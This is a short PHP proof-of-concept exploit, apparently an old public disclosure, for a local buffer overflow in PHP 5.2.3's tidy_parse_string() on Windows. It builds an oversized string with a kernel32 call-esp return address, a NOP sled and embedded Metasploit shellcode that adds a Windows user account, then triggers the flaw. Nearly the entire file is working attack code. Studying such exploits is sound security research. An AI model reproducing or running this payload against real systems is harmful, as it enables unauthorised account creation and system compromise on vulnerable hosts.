<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org

//quickly tested on xp sp2, worked both from the cli and on apache
//let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

# win32_adduser -  PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com
$scode =
"\xfc\xbb\x0b\xad\x7d\x9a\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85".
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xf7\x45\x39\x9a\x07\x96\x49".
"\xdf\x3b\x1d\x31\xe5\x3b\x20\x25\x6e\xf4\x3a\x32\x2e\x2a\x3a\xaf".
"\x98\xa1\x08\xa4\x1a\x5b\x41\x7a\x85\x0f\x26\xba\xc2\x48\xe6\xf1".
"\x26\x57\x2a\xee\xcd\x6c\xfe\xd5\x29\xe7\x1b\x9e\x6d\x23\xe5\x4a".
"\xf7\xa0\xe9\xc7\x73\xe9\xed\xd6\x68\x9e\x12\x52\x6f\x4b\xa3\x38".
"\x54\x8f\x77\xf1\x54\xeb\xfc\xb2\x64\x76\xc2\x4b\x89\xf3\x83\xa7".
"\x1a\x73\x18\x15\x97\x1b\x28\x8e\xa1\x50\xa8\xe0\xb2\x66\xa9\x8b".
"\xdb\x5a\xf6\xba\xed\xc2\x5e\x34\xe9\x81\x9f\x3d\x5a\xed\xf0\x0c".
"\xba\x8d\x66\x09\xc5\xc7\x79\x7e\xc5\x30\xe6\xed\x5d\x90\x8c\x95".
"\xf8\xcc\x61\x05\x23\x62\x1b\xbd\x03\x0f\x90\x58\x36\xcf\x25\xd6".
"\xd8\x2f\xbe\x62\x50\x0f\x11\xd2\xde\x0b\x4d\xf2\xf8\xb3\xe3\x9f".
"\x70\x93\x97\x30\x1a\xb2\x0b\xa8\xae\x5b\xa1\x46\x6f\xe2\x2d\xca".
"\x06\x8a\xc4\x67\xad\x20\x76\xfc\x22\xb6\x0b\xdc\xcf\x43\x82\x3c".
"\x1f\xea\x1e\x79\x5f\xec\x9e\x81\x5f";

$EIP="\x8B\x51\x81\x7C"; //0x7C81518B      call esp kernel32.dll
$NOP=str_repeat("\x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>